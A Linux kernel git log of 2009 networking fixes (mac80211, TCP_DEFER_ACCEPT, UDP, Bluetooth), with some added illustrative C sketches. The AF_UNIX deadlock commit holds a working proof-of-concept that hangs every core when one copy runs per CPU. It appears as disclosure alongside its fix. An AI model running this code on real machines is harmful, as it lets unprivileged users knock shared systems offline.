03 Nov, 2009

4 commits

  • * git://git.kernel.org/pub/scm/linux/kernel/git/davem/net-2.6: (21 commits)
    mac80211: check interface is down before type change
    cfg80211: fix NULL ptr deref
    libertas if_usb: Fix crash on 64-bit machines
    mac80211: fix reason code output endianness
    mac80211: fix addba timer
    ath9k: fix misplaced semicolon on rate control
    b43: Fix DMA TX bounce buffer copying
    mac80211: fix BSS leak
    rt73usb.c : more ids
    ipw2200: fix oops on missing firmware
    gre: Fix dev_addr clobbering for gretap
    sky2: set carrier off in probe
    net: fix sk_forward_alloc corruption
    pcnet_cs: add cis of PreMax PE-200 ethernet pcmcia card
    r8169: Fix card drop incoming VLAN tagged MTU byte large jumbo frames
    ibmtr: possible Read buffer overflow?
    net: Fix RPF to work with policy routing
    net: fix kmemcheck annotations
    e1000e: rework disable K1 at 1000Mbps for 82577/82578
    e1000e: config PHY via software after resets
    ...

    Linus Torvalds
     
  • David S. Miller
     
  • For some strange reason the netif_running() check
    ended up after the actual type change instead of
    before, potentially causing all kinds of problems
    if the interface is up while changing the type;
    one of the problems manifests itself as a warning:

    WARNING: at net/mac80211/iface.c:651 ieee80211_teardown_sdata+0xda/0x1a0 [mac80211]()
    Hardware name: Aspire one
    Pid: 2596, comm: wpa_supplicant Tainted: G W 2.6.31-10-generic #32-Ubuntu
    Call Trace:
    [] warn_slowpath_common+0x6d/0xa0
    [] warn_slowpath_null+0x15/0x20
    [] ieee80211_teardown_sdata+0xda/0x1a0 [mac80211]
    [] ieee80211_if_change_type+0x4a/0xc0 [mac80211]
    [] ieee80211_change_iface+0x61/0xa0 [mac80211]
    [] cfg80211_wext_siwmode+0xc7/0x120 [cfg80211]
    [] ioctl_standard_call+0x58/0xf0

    (http://www.kerneloops.org/searchweek.php?search=ieee80211_teardown_sdata)

    Cc: Arjan van de Ven
    Cc: stable@kernel.org
    Signed-off-by: Johannes Berg
    Signed-off-by: John W. Linville

    Johannes Berg
     
  • commit 211a4d12abf86fe0df4cd68fc6327cbb58f56f81
    Author: Johannes Berg
    Date: Tue Oct 20 15:08:53 2009 +0900

    cfg80211: sme: deauthenticate on assoc failure

    introduced a potential NULL pointer dereference that
    some people have been hitting for some reason -- the
    params.bssid pointer is not guaranteed to be non-NULL
    for what seems to be a race between various ways of
    reaching the same thing.

    While I'm trying to analyse the problem more let's
    first fix the crash. I think the real fix may be to
    avoid doing _anything_ if it ended up being NULL, but
    right now I'm not sure yet.

    I think
    http://bugzilla.kernel.org/show_bug.cgi?id=14342
    might also be this issue.

    Reported-by: Parag Warudkar
    Tested-by: Parag Warudkar
    Signed-off-by: Johannes Berg
    Signed-off-by: John W. Linville

    Johannes Berg
     

02 Nov, 2009

1 commit

  • The patch below also addresses a couple of other corner cases in readdir
    seen with a large (e.g. 64k) msize. I'm not sure what people think of
    my co-opting of fid->aux here. I'd be happy to rework if there's a better
    way.

    When the size of the user supplied buffer passed to readdir is smaller
    than the data returned in one go by the 9P read request, v9fs_dir_readdir()
    currently discards extra data so that, on the next call, a 9P read
    request will be issued with offset < previous offset + bytes returned,
    which violates the constraint described in paragraph 3 of the read(5)
    description. This patch preserves the leftover data in fid->aux for use
    in the next call.

    Signed-off-by: Jim Garlick
    Signed-off-by: Eric Van Hensbergen

    Eric Van Hensbergen
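
    The leftover-data idea described above can be illustrated in userspace.
    This is only a sketch under stated assumptions, not the v9fs code: the
    struct leftover type and both helper names are hypothetical, the buffer
    size is arbitrary, and plain bytes stand in for directory entries.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical stand-in for the state the patch keeps in fid->aux. */
struct leftover {
    unsigned char buf[256];
    size_t head;   /* first byte not yet handed to the caller */
    size_t tail;   /* one past the last valid byte */
};

/* Store the data returned by one (simulated) read request. */
static void leftover_fill(struct leftover *l, const unsigned char *data, size_t n)
{
    if (n > sizeof(l->buf))
        n = sizeof(l->buf);
    memcpy(l->buf, data, n);
    l->head = 0;
    l->tail = n;
}

/* Copy out as much as the caller's buffer holds; keep the rest for later. */
static size_t leftover_drain(struct leftover *l, unsigned char *out, size_t cap)
{
    size_t avail = l->tail - l->head;
    size_t n = avail < cap ? avail : cap;

    memcpy(out, l->buf + l->head, n);
    l->head += n;
    return n;
}
```

    A caller would only issue a new read once leftover_drain() returns 0,
    so the offset of the next request never moves backwards.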
     

31 Oct, 2009

5 commits

  • When HT debugging is enabled and we receive a DelBA
    frame we print out the reason code in the wrong byte
    order. Fix that so we don't get weird values printed.

    Signed-off-by: Johannes Berg
    Signed-off-by: John W. Linville

    Johannes Berg
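
    As background for the byte-order fix above: 802.11 frame fields are
    little-endian on the wire, and the kernel converts them with
    le16_to_cpu() before printing. A portable userspace sketch of the same
    conversion follows; the helper name le16_decode is hypothetical and
    this is not the mac80211 code.

```c
#include <stdint.h>

/* Decode a 16-bit little-endian field regardless of host byte order. */
static uint16_t le16_decode(const uint8_t bytes[2])
{
    return (uint16_t)(bytes[0] | (bytes[1] << 8));
}
```

    Reading the two bytes as a native 16-bit integer on a big-endian host
    would swap them, which is the kind of odd value the commit describes.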
     
  • The addba timer function acquires the sta spinlock,
    but at the same time we try to del_timer_sync() it
    under the spinlock which can produce deadlocks.

    To fix this, always del_timer_sync() the timer in
    ieee80211_process_addba_resp() and add it again
    after checking the conditions, if necessary.

    Signed-off-by: Johannes Berg
    Signed-off-by: John W. Linville

    Johannes Berg
     
  • The IBSS code leaks a BSS struct after telling
    cfg80211 about a given BSS by passing a frame.

    Signed-off-by: Johannes Berg
    Signed-off-by: John W. Linville

    Johannes Berg
     
  • Nathan Neulinger noticed that gretap devices get their MAC address
    from the local IP address, which results in invalid MAC addresses
    half of the time.

    This is because gretap is still using the tunnel netdev ops rather
    than the correct tap netdev ops struct.

    This patch also fixes changelink to not clobber the MAC address
    for the gretap case.

    Signed-off-by: Herbert Xu
    Acked-by: Stephen Hemminger
    Tested-by: Nathan Neulinger
    Signed-off-by: David S. Miller

    Herbert Xu
     
    On UDP sockets, we must call skb_free_datagram() with the socket locked,
    or risk sk_forward_alloc corruption. This requirement is not respected
    in SUNRPC.

    Add a convenient helper, skb_free_datagram_locked(), and use it in SUNRPC.

    Reported-by: Francis Moreau
    Signed-off-by: Eric Dumazet
    Signed-off-by: David S. Miller

    Eric Dumazet
     

30 Oct, 2009

2 commits

  • Policy routing is not looked up by mark on reverse path filtering.
    This fixes it.

    Signed-off-by: Jamal Hadi Salim
    Signed-off-by: David S. Miller

    jamal
     
  • * git://git.kernel.org/pub/scm/linux/kernel/git/davem/net-2.6: (43 commits)
    net: Fix 'Re: PACKET_TX_RING: packet size is too long'
    netdev: usb: dm9601.c can drive a device not supported yet, add support for it
    qlge: Fix firmware mailbox command timeout.
    qlge: Fix EEH handling.
    AF_RAW: Augment raw_send_hdrinc to expand skb to fit iphdr->ihl (v2)
    bonding: fix a race condition in calls to slave MII ioctls
    virtio-net: fix data corruption with OOM
    sfc: Set ip_summed correctly for page buffers passed to GRO
    cnic: Fix L2CTX_STATUSB_NUM offset in context memory.
    MAINTAINERS: rt2x00 list is moderated
    airo: Reorder tests, check bounds before element
    mac80211: fix for incorrect sequence number on hostapd injected frames
    libertas spi: fix sparse errors
    mac80211: trivial: fix spelling in mesh_hwmp
    cfg80211: sme: deauthenticate on assoc failure
    mac80211: keep auth state when assoc fails
    mac80211: fix ibss joining
    b43: add 'struct b43_wl' missing declaration
    b43: Fix Bugzilla #14181 and the bug from the previous 'fix'
    rt2x00: Fix crypto in TX frame for rt2800usb
    ...

    Linus Torvalds
     

29 Oct, 2009

2 commits

  • Currently PACKET_TX_RING forces a certain amount of every frame to remain
    unused. This probably originates from an early version of the
    PACKET_TX_RING patch that in fact used the extra space when the (since
    removed) CONFIG_PACKET_MMAP_ZERO_COPY option was enabled. The current
    code does not make any use of this extra space.

    This patch removes the extra space reservation and lets userspace make
    use of the full frame size.

    Signed-off-by: Gabor Gombas
    Signed-off-by: David S. Miller

    Gabor Gombas
     
  • Augment raw_send_hdrinc to correct for incorrect ip header length values

    A series of oopses was reported to me recently. Apparently when using AF_RAW
    sockets to send data to peers that were reachable via ipsec encapsulation,
    people could panic or BUG halt their systems.

    I've tracked the problem down to user space sending an invalid ip header over an
    AF_RAW socket with IP_HDRINCL set to 1.

    Basically what happens is that userspace sends down an ip frame that includes
    only the header (no data), but sets the ip header ihl value to a large number,
    one that is larger than the total amount of data passed to the sendmsg call. In
    raw_send_hdrinc, we allocate an skb based on the size of the data in the msghdr
    that was passed in, but assume the data is all valid. Later during ipsec
    encapsulation, xfrm4_transport_output moves the entire frame back in the skbuff
    to provide headroom for the ipsec headers. During this operation, the
    skb->transport_header is repointed to a spot computed by
    skb->network_header + the ip header length (ihl). Since so little data was
    passed in relative to the value of ihl provided by the raw socket, we point
    transport header to an unknown location, resulting in various crashes.

    The fix for this is pretty straightforward: simply validate the value of
    iph->ihl when sending over a raw socket. If (iph->ihl*4U) > user data buffer
    size, drop the frame and return -EINVAL. I just confirmed this fixes the
    reported crashes.

    Signed-off-by: Neil Horman
    Acked-by: Eric Dumazet
    Signed-off-by: David S. Miller

    Neil Horman
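
    The check described above can be sketched in userspace as follows. This
    is an illustration under assumptions, not the kernel patch: the function
    name check_ihl is hypothetical, and it reads the IHL from the low nibble
    of the first header byte instead of going through struct iphdr.

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Return 0 if the header length claimed by the packet fits inside the
 * buffer the caller actually supplied, -EINVAL otherwise.
 */
static int check_ihl(const uint8_t *pkt, size_t len)
{
    unsigned int ihl;

    if (len < 1)
        return -EINVAL;

    /* IPv4: high nibble of byte 0 is the version, low nibble is IHL,
     * counted in 32-bit words. */
    ihl = pkt[0] & 0x0f;
    if ((size_t)ihl * 4U > len)
        return -EINVAL;

    return 0;
}
```

    With a 20-byte buffer, a first byte of 0x45 (IHL 5, 20 bytes) passes,
    while 0x4f (IHL 15, 60 bytes) is rejected.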
     

28 Oct, 2009

5 commits

  • When hostapd injects a frame, e.g. an authentication or association
    response, mac80211 looks for a suitable access point virtual interface
    to associate the frame with based on its source address. This makes it
    possible e.g. to correctly assign sequence numbers to the frames.

    A small typo in the ethernet address comparison statement caused a
    failure to find a suitable AP interface. Sequence numbers on such
    frames were therefore left unassigned, causing some clients
    (especially Windows-based 11b/g clients) to reject them and fail to
    authenticate or associate with the access point. This patch fixes the
    typo in the address comparison statement.

    Signed-off-by: Björn Smedman
    Reviewed-by: Johannes Berg
    Cc: stable@kernel.org
    Signed-off-by: John W. Linville

    Björn Smedman
     
  • Fix a typo in the description of hwmp_route_info_get(), no function
    changes.

    Signed-off-by: Andrey Yurovsky
    Signed-off-by: John W. Linville

    Andrey Yurovsky
     
  • When the in-kernel SME gets an association failure from
    the AP we don't deauthenticate, and thus get into a very
    confused state which will lead to warnings later on. Fix
    this by actually deauthenticating when the AP indicates
    an association failure.

    (Brought to you by the hacking session at Kernel Summit 2009 in Tokyo,
    Japan. -- JWL)

    Signed-off-by: Johannes Berg
    Signed-off-by: John W. Linville

    Johannes Berg
     
  • When association fails, we should stay authenticated,
    which in mac80211 is represented by the existence of
    the mlme work struct, so we cannot free that, instead
    we need to just set it to idle.

    (Brought to you by the hacking session at Kernel Summit 2009 in Tokyo,
    Japan. -- JWL)

    Signed-off-by: Johannes Berg
    Signed-off-by: John W. Linville

    Johannes Berg
     
  • Recent commit "mac80211: fix logic error ibss merge bssid check" fixed
    joining of an ibss cell when a static bssid is provided. In this case
    ifibss->bssid is set before the cell is joined and comparing that address
    to a bss should thus always succeed. Unfortunately this change broke the
    other case of joining an ibss cell without providing a static bssid, where
    the value of ifibss->bssid is not set before the cell is joined.

    Since ifibss->bssid may be set before or after joining the cell we do not
    learn anything by comparing it to a known bss. Remove this check.

    Signed-off-by: Reinette Chatre
    Signed-off-by: John W. Linville

    Reinette Chatre
     

24 Oct, 2009

1 commit

  • While playing with pktgen, I realized IP ID was not filled and a
    random value was taken, possibly leaking 2 bytes of kernel memory.

    We can use an increasing ID, this can help diagnostics anyway.

    Also clear packet payload, instead of leaking kernel memory.

    Signed-off-by: Eric Dumazet
    Signed-off-by: David S. Miller

    Eric Dumazet
     

23 Oct, 2009

3 commits

  • Commit b6b39e8f3fbbb (tcp: Try to catch MSG_PEEK bug) added a printk()
    to the WARN_ON() that's in tcp.c. This patch changes this combination
    to WARN(); the advantage of WARN() is that the printk message shows up
    inside the message, so that kerneloops.org will collect the message.

    In addition, this gets rid of an extra if() statement.

    Signed-off-by: Arjan van de Ven
    Signed-off-by: David S. Miller

    Arjan van de Ven
     
  • * git://git.kernel.org/pub/scm/linux/kernel/git/rusty/linux-2.6-for-linus:
    move virtrng_remove to .devexit.text
    move virtballoon_remove to .devexit.text
    virtio_blk: Revert serial number support
    virtio: let header files include virtio_ids.h
    virtio_blk: revert QUEUE_FLAG_VIRT addition

    Linus Torvalds
     
  • * git://git.kernel.org/pub/scm/linux/kernel/git/davem/net-2.6: (21 commits)
    niu: VLAN_ETH_HLEN should be used to make sure that the whole MAC header was copied to the head buffer in the Vlan packets case
    KS8851: Fix ks8851_set_rx_mode() for IFF_MULTICAST
    KS8851: Fix MAC address write order
    KS8851: Add soft reset at probe time
    net: fix section mismatch in fec.c
    net: Fix struct inet_timewait_sock bitfield annotation
    tcp: Try to catch MSG_PEEK bug
    net: Fix IP_MULTICAST_IF
    bluetooth: static lock key fix
    bluetooth: scheduling while atomic bug fix
    tcp: fix TCP_DEFER_ACCEPT retrans calculation
    tcp: reduce SYN-ACK retrans for TCP_DEFER_ACCEPT
    tcp: accept socket after TCP_DEFER_ACCEPT period
    Revert "tcp: fix tcp_defer_accept to consider the timeout"
    AF_UNIX: Fix deadlock on connecting to shutdown socket
    ethoc: clear only pending irqs
    ethoc: inline regs access
    vmxnet3: use dev_dbg, fix build for CONFIG_BLOCK=n
    virtio_net: use dev_kfree_skb_any() in free_old_xmit_skbs()
    be2net: fix support for PCI hot plug
    ...

    Linus Torvalds
     

22 Oct, 2009

1 commit

  • Rusty,

    commit 3ca4f5ca73057a617f9444a91022d7127041970a
    virtio: add virtio IDs file
    moved all device IDs into a single file. While the change itself is
    a very good one, it can break userspace applications. For example
    if a userspace tool wanted to get the ID of virtio_net it used to
    include virtio_net.h. This no longer works, since virtio_net.h
    does not include virtio_ids.h.
    This patch moves all "#include <linux/virtio_ids.h>" from the C
    files into the header files, making the header files compatible with
    the old ones.

    In addition, this patch exports virtio_ids.h to userspace.

    CC: Fernando Luis Vazquez Cao
    Signed-off-by: Christian Borntraeger
    Signed-off-by: Rusty Russell

    Christian Borntraeger
     

20 Oct, 2009

8 commits

  • This patch tries to print out more information when we hit the
    MSG_PEEK bug in tcp_recvmsg. It's been around since at least
    2005 and it's about time that we finally fix it.

    Signed-off-by: Herbert Xu
    Signed-off-by: David S. Miller

    Herbert Xu
     
  • ipv4/ipv6 setsockopt(IP_MULTICAST_IF) have dubious __dev_get_by_index() calls.

    This function should be called only with RTNL or dev_base_lock held, or a
    reader could see a corrupt hash chain and eventually enter an endless loop.

    The fix is to call dev_get_by_index()/dev_put().

    If this happens to be performance critical, we could define a new dev_exist_by_index()
    function to avoid touching dev refcount.

    Signed-off-by: Eric Dumazet
    Signed-off-by: David S. Miller

    Eric Dumazet
     
  • When shutting down a ppp connection, lockdep warns about a
    non-static key because the lock is not initialized properly
    at that time.

    Fix this by adjusting the lock/skb_queue_head init order.

    [ 94.339261] INFO: trying to register non-static key.
    [ 94.342509] the code is fine but needs lockdep annotation.
    [ 94.342509] turning off the locking correctness validator.
    [ 94.342509] Pid: 0, comm: swapper Not tainted 2.6.31-mm1 #2
    [ 94.342509] Call Trace:
    [ 94.342509] [] register_lock_class+0x58/0x241
    [ 94.342509] [] ? __lock_acquire+0xb57/0xb73
    [ 94.342509] [] __lock_acquire+0xac/0xb73
    [ 94.342509] [] ? lock_release_non_nested+0x17b/0x1de
    [ 94.342509] [] lock_acquire+0x67/0x84
    [ 94.342509] [] ? skb_dequeue+0x15/0x41
    [ 94.342509] [] _spin_lock_irqsave+0x2f/0x3f
    [ 94.342509] [] ? skb_dequeue+0x15/0x41
    [ 94.342509] [] skb_dequeue+0x15/0x41
    [ 94.342509] [] ? _read_unlock+0x1d/0x20
    [ 94.342509] [] skb_queue_purge+0x14/0x1b
    [ 94.342509] [] l2cap_recv_frame+0xea1/0x115a [l2cap]
    [ 94.342509] [] ? __lock_acquire+0xb57/0xb73
    [ 94.342509] [] ? mark_lock+0x1e/0x1c7
    [ 94.342509] [] ? hci_rx_task+0xd2/0x1bc [bluetooth]
    [ 94.342509] [] l2cap_recv_acldata+0xb1/0x1c6 [l2cap]
    [ 94.342509] [] hci_rx_task+0x106/0x1bc [bluetooth]
    [ 94.342509] [] ? l2cap_recv_acldata+0x0/0x1c6 [l2cap]
    [ 94.342509] [] tasklet_action+0x69/0xc1
    [ 94.342509] [] __do_softirq+0x94/0x11e
    [ 94.342509] [] do_softirq+0x36/0x5a
    [ 94.342509] [] irq_exit+0x35/0x68
    [ 94.342509] [] do_IRQ+0x72/0x89
    [ 94.342509] [] common_interrupt+0x2e/0x34
    [ 94.342509] [] ? pm_qos_add_requirement+0x63/0x9d
    [ 94.342509] [] ? acpi_idle_enter_bm+0x209/0x238
    [ 94.342509] [] cpuidle_idle_call+0x5c/0x94
    [ 94.342509] [] cpu_idle+0x4e/0x6f
    [ 94.342509] [] rest_init+0x53/0x55
    [ 94.342509] [] start_kernel+0x2f0/0x2f5
    [ 94.342509] [] i386_start_kernel+0x91/0x96

    Reported-by: Oliver Hartkopp
    Signed-off-by: Dave Young
    Tested-by: Oliver Hartkopp
    Signed-off-by: David S. Miller

    Dave Young
     
  • Due to driver core changes, dev_set_drvdata() now calls kzalloc(), which
    may sleep, but hci_conn_add() is called in atomic context.

    As was done for dev_set_name(), move dev_set_drvdata() to the work queue
    function.

    The oops is as follows:

    Oct 2 17:41:59 darkstar kernel: [ 438.001341] BUG: sleeping function called from invalid context at mm/slqb.c:1546
    Oct 2 17:41:59 darkstar kernel: [ 438.001345] in_atomic(): 1, irqs_disabled(): 0, pid: 2133, name: sdptool
    Oct 2 17:41:59 darkstar kernel: [ 438.001348] 2 locks held by sdptool/2133:
    Oct 2 17:41:59 darkstar kernel: [ 438.001350] #0: (sk_lock-AF_BLUETOOTH-BTPROTO_L2CAP){+.+.+.}, at: [] lock_sock+0xa/0xc [l2cap]
    Oct 2 17:41:59 darkstar kernel: [ 438.001360] #1: (&hdev->lock){+.-.+.}, at: [] l2cap_sock_connect+0x103/0x26b [l2cap]
    Oct 2 17:41:59 darkstar kernel: [ 438.001371] Pid: 2133, comm: sdptool Not tainted 2.6.31-mm1 #2
    Oct 2 17:41:59 darkstar kernel: [ 438.001373] Call Trace:
    Oct 2 17:41:59 darkstar kernel: [ 438.001381] [] __might_sleep+0xde/0xe5
    Oct 2 17:41:59 darkstar kernel: [ 438.001386] [] __kmalloc+0x4a/0x15a
    Oct 2 17:41:59 darkstar kernel: [ 438.001392] [] ? kzalloc+0xb/0xd
    Oct 2 17:41:59 darkstar kernel: [ 438.001396] [] kzalloc+0xb/0xd
    Oct 2 17:41:59 darkstar kernel: [ 438.001400] [] device_private_init+0x15/0x3d
    Oct 2 17:41:59 darkstar kernel: [ 438.001405] [] dev_set_drvdata+0x18/0x26
    Oct 2 17:41:59 darkstar kernel: [ 438.001414] [] hci_conn_init_sysfs+0x40/0xd9 [bluetooth]
    Oct 2 17:41:59 darkstar kernel: [ 438.001422] [] ? hci_conn_add+0x128/0x186 [bluetooth]
    Oct 2 17:41:59 darkstar kernel: [ 438.001429] [] hci_conn_add+0x177/0x186 [bluetooth]
    Oct 2 17:41:59 darkstar kernel: [ 438.001437] [] hci_connect+0x3c/0xfb [bluetooth]
    Oct 2 17:41:59 darkstar kernel: [ 438.001442] [] l2cap_sock_connect+0x174/0x26b [l2cap]
    Oct 2 17:41:59 darkstar kernel: [ 438.001448] [] sys_connect+0x60/0x7a
    Oct 2 17:41:59 darkstar kernel: [ 438.001453] [] ? lock_release_non_nested+0x84/0x1de
    Oct 2 17:41:59 darkstar kernel: [ 438.001458] [] ? might_fault+0x47/0x81
    Oct 2 17:41:59 darkstar kernel: [ 438.001462] [] ? might_fault+0x47/0x81
    Oct 2 17:41:59 darkstar kernel: [ 438.001468] [] ? __copy_from_user_ll+0x11/0xce
    Oct 2 17:41:59 darkstar kernel: [ 438.001472] [] sys_socketcall+0x82/0x17b
    Oct 2 17:41:59 darkstar kernel: [ 438.001477] [] syscall_call+0x7/0xb

    Signed-off-by: Dave Young
    Signed-off-by: David S. Miller

    Dave Young
     
  • Fix TCP_DEFER_ACCEPT conversion between seconds and
    retransmission to match the TCP SYN-ACK retransmission periods
    because the time is converted to such retransmissions. The old
    algorithm selects one more retransmission in some cases. Allow
    up to 255 retransmissions.

    Signed-off-by: Julian Anastasov
    Acked-by: Eric Dumazet
    Signed-off-by: David S. Miller

    Julian Anastasov
     
  • Change SYN-ACK retransmitting code for the TCP_DEFER_ACCEPT
    users to not retransmit SYN-ACKs during the deferring period if
    ACK from client was received. The goal is to reduce traffic
    during the deferring period. When the period is finished
    we continue with sending SYN-ACKs (at least one) but this time
    any traffic from client will change the request to established
    socket allowing application to terminate it properly.
    Also, do not drop acked request if sending of SYN-ACK fails.

    Signed-off-by: Julian Anastasov
    Acked-by: Eric Dumazet
    Signed-off-by: David S. Miller

    Julian Anastasov
     
  • Willy Tarreau and many other folks in recent years
    were concerned about what happens when the TCP_DEFER_ACCEPT
    period expires for clients which sent an ACK packet. They prefer
    clients that actively resend ACK on our SYN-ACK retransmissions to be
    converted from open requests to sockets and queued to the
    listener for accepting after the deferring period is finished.
    The application server can then decide to wait longer for data
    or to properly terminate the connection with FIN if read()
    returns EAGAIN, which is an indication of accepting after
    the deferring period. This change can still have side effects
    for applications that always expect to see data on the accepted
    socket. Others can be prepared to work in both modes (with or
    without TCP_DEFER_ACCEPT period) and their data processing can
    ignore the read=EAGAIN notification and allocate resources for
    clients which proved to have no data to send during the deferring
    period. OTOH, servers that use TCP_DEFER_ACCEPT=1 as a flag (not
    as a timeout) to wait for data will notice clients that didn't
    send data for 3 seconds but that still resend ACKs.
    Thanks to Willy Tarreau for the initial idea and to
    Eric Dumazet for the review and testing the change.

    Signed-off-by: Julian Anastasov
    Acked-by: Eric Dumazet
    Signed-off-by: David S. Miller

    Julian Anastasov
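
    For readers unfamiliar with the option discussed above, a listener opts
    in through setsockopt(). The sketch below is Linux-specific and the
    helper name set_defer_accept is hypothetical; it only shows how the
    timeout in seconds is passed, not how a server should react to EAGAIN.

```c
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <sys/socket.h>

/*
 * Ask the kernel to wake the listener only once data has arrived, or
 * once roughly `seconds` have elapsed. Returns 0 on success, -1 with
 * errno set on failure, exactly as setsockopt() does.
 */
static int set_defer_accept(int listen_fd, int seconds)
{
    return setsockopt(listen_fd, IPPROTO_TCP, TCP_DEFER_ACCEPT,
                      &seconds, sizeof(seconds));
}
```

    A server would typically call set_defer_accept(fd, secs) on the
    listening socket before or right after listen().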
     
  • This reverts commit 6d01a026b7d3009a418326bdcf313503a314f1ea.

    Julian Anastasov, Willy Tarreau and Eric Dumazet have come up
    with a more correct way to deal with this.

    Signed-off-by: David S. Miller

    David S. Miller
     

19 Oct, 2009

1 commit

  • I found a deadlock bug in UNIX domain sockets, which lets non-root
    users mount a DoS attack against the local machine.

    How to reproduce:
    1. Make a listening AF_UNIX/SOCK_STREAM socket with an abstract
    namespace(*), and shutdown(2) it.
    2. Repeat connect(2)ing to the listening socket from the other sockets
    until the connection backlog is full.
    3. connect(2) takes the CPU forever. If every core is taken, the
    system hangs.

    PoC code: (Run as many times as cores on SMP machines.)

    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <sys/un.h>

    int main(void)
    {
        int ret;
        int csd;
        int lsd;
        struct sockaddr_un sun;

        /* make an abstract name address (*) */
        memset(&sun, 0, sizeof(sun));
        sun.sun_family = PF_UNIX;
        sprintf(&sun.sun_path[1], "%d", getpid());

        /* create the listening socket and shutdown */
        lsd = socket(AF_UNIX, SOCK_STREAM, 0);
        bind(lsd, (struct sockaddr *)&sun, sizeof(sun));
        listen(lsd, 1);
        shutdown(lsd, SHUT_RDWR);

        /* connect loop */
        alarm(15); /* forcibly exit the loop after 15 sec */
        for (;;) {
            csd = socket(AF_UNIX, SOCK_STREAM, 0);
            ret = connect(csd, (struct sockaddr *)&sun, sizeof(sun));
            if (-1 == ret) {
                perror("connect()");
                break;
            }
            puts("Connection OK");
        }
        return 0;
    }

    (*) Make sun_path[0] = 0 to use the abstract namespace.
    If a file-based socket is used, the system doesn't deadlock because
    of context switches in the file system layer.

    Why this happens:
    Error checks between unix_socket_connect() and unix_wait_for_peer() are
    inconsistent. The former calls the latter to wait until the backlog is
    processed. Although the latter returns without doing anything when the
    socket is shutdown, the former doesn't check the shutdown state and
    just retries calling the latter forever.

    Patch:
    The patch below adds a shutdown check into unix_socket_connect(), so
    connect(2) to the shutdown socket will return -ECONNREFUSED.

    Signed-off-by: Tomoki Sekiyama
    Signed-off-by: Masanori Yoshida
    Signed-off-by: David S. Miller

    Tomoki Sekiyama
     

16 Oct, 2009

1 commit

  • * git://git.kernel.org/pub/scm/linux/kernel/git/davem/net-2.6: (53 commits)
    vmxnet: fix 2 build problems
    net: add support for STMicroelectronics Ethernet controllers.
    net: ks8851_mll uses mii interfaces
    net/fec_mpc52xx: Fix kernel panic on FEC error
    net: Fix OF platform drivers coldplug/hotplug when compiled as modules
    TI DaVinci EMAC: Clear statistics register properly.
    r8169: partial support and phy init for the 8168d
    irda/sa1100_ir: check return value of startup hook
    udp: Fix udp_poll() and ioctl()
    WAN: fix Cisco HDLC handshaking.
    tcp: fix tcp_defer_accept to consider the timeout
    3c574_cs: spin_lock the set_multicast_list function
    net: Teach pegasus driver to ignore bluetoother adapters with clashing Vendor:Product IDs
    netxen: fix pci bar mapping
    ethoc: fix warning from 32bit build
    libertas: fix build
    net: VMware virtual Ethernet NIC driver: vmxnet3
    net: Fix IXP 2000 network driver building.
    libertas: fix build
    mac80211: document ieee80211_rx() context requirement
    ...

    Linus Torvalds
     

14 Oct, 2009

1 commit


13 Oct, 2009

5 commits

  • udp_poll() can in some circumstances drop frames with incorrect checksums.

    Problem is we now have to lock the socket while dropping frames, or risk
    sk_forward_alloc corruption.

    This bug has been present since commit 95766fff6b9a78d1
    ([UDP]: Add memory accounting.)

    While we are at it, we can correct ioctl(SIOCINQ) to also drop bad frames.

    Signed-off-by: Eric Dumazet
    Signed-off-by: David S. Miller

    Eric Dumazet
     
  • I was trying to use TCP_DEFER_ACCEPT and noticed that if the
    client does not talk, the connection is never accepted and
    remains in SYN_RECV state until the retransmits expire, where
    it finally is deleted. This is bad when some firewall such as
    netfilter sits between the client and the server because the
    firewall sees the connection in ESTABLISHED state while the
    server will finally silently drop it without sending an RST.

    This behaviour contradicts the man page which says it should
    wait only for some time :

    TCP_DEFER_ACCEPT (since Linux 2.4)
    Allows a listener to be awakened only when data arrives
    on the socket. Takes an integer value (seconds), this
    can bound the maximum number of attempts TCP will
    make to complete the connection. This option should not
    be used in code intended to be portable.

    Also, looking at ipv4/tcp.c, a retransmit counter is correctly
    computed :

    case TCP_DEFER_ACCEPT:
        icsk->icsk_accept_queue.rskq_defer_accept = 0;
        if (val > 0) {
            /* Translate value in seconds to number of
             * retransmits */
            while (icsk->icsk_accept_queue.rskq_defer_accept < 32 &&
                   val > ((TCP_TIMEOUT_INIT / HZ) <<
                          icsk->icsk_accept_queue.rskq_defer_accept))
                icsk->icsk_accept_queue.rskq_defer_accept++;
            icsk->icsk_accept_queue.rskq_defer_accept++;
        }
        break;

    ==> rskq_defer_accept is used as a counter of retransmits.

    But in tcp_minisocks.c, this counter is only checked. And in
    fact, I have found no location which updates it. So I think
    that what was intended was to decrease it in tcp_minisocks
    whenever it is checked, which the trivial patch below does.

    Signed-off-by: Willy Tarreau
    Signed-off-by: David S. Miller

    Willy Tarreau
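
    The seconds-to-retransmits translation quoted above can be tried out in
    userspace. The sketch below mirrors the quoted loop only; the function
    name is hypothetical, and the 3-second initial timeout is an assumption
    standing in for TCP_TIMEOUT_INIT / HZ. Wider arithmetic is used so the
    shift cannot overflow.

```c
/* Assumed value of TCP_TIMEOUT_INIT / HZ, in seconds. */
#define TIMEOUT_INIT_SECS 3LL

/*
 * Translate a TCP_DEFER_ACCEPT value in seconds into a retransmit
 * count, following the loop quoted from ipv4/tcp.c: find the first
 * n where val <= TIMEOUT_INIT_SECS << n, then add one.
 */
static int defer_secs_to_retrans(int val)
{
    int n = 0;

    if (val > 0) {
        while (n < 32 && (long long)val > (TIMEOUT_INIT_SECS << n))
            n++;
        n++;
    }
    return n;
}
```

    Under that assumption, values of 1 to 3 seconds map to 1 retransmit,
    4 to 6 seconds map to 2, and 7 to 12 seconds map to 3.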
     
  • ieee80211_rx() must be called with softirqs disabled
    since the networking stack requires this for netif_rx()
    and some code in mac80211 can assume that it can not
    be processing its own tasklet and this call at the same
    time.

    It may be possible to remove this requirement after a
    careful audit of mac80211 and doing any needed locking
    improvements in it along with disabling softirqs around
    netif_rx(). An alternative might be to push all packet
    processing to process context in mac80211, instead of
    to the tasklet, and add other synchronisation.

    Signed-off-by: Johannes Berg
    Signed-off-by: John W. Linville

    Johannes Berg
     
  • When a scan completes, we call ieee80211_sta_find_ibss(),
    which is also called from other places. When the scan was
    done in software, there's no problem as both run from the
    single-threaded mac80211 workqueue and are thus serialised
    against each other, but with hardware scan the completion
    can be in a different context and race against callers of
    this function from the workqueue (e.g. due to beacon RX).
    So instead of calling ieee80211_sta_find_ibss() directly,
    just arm the timer and have it fire, scheduling the work,
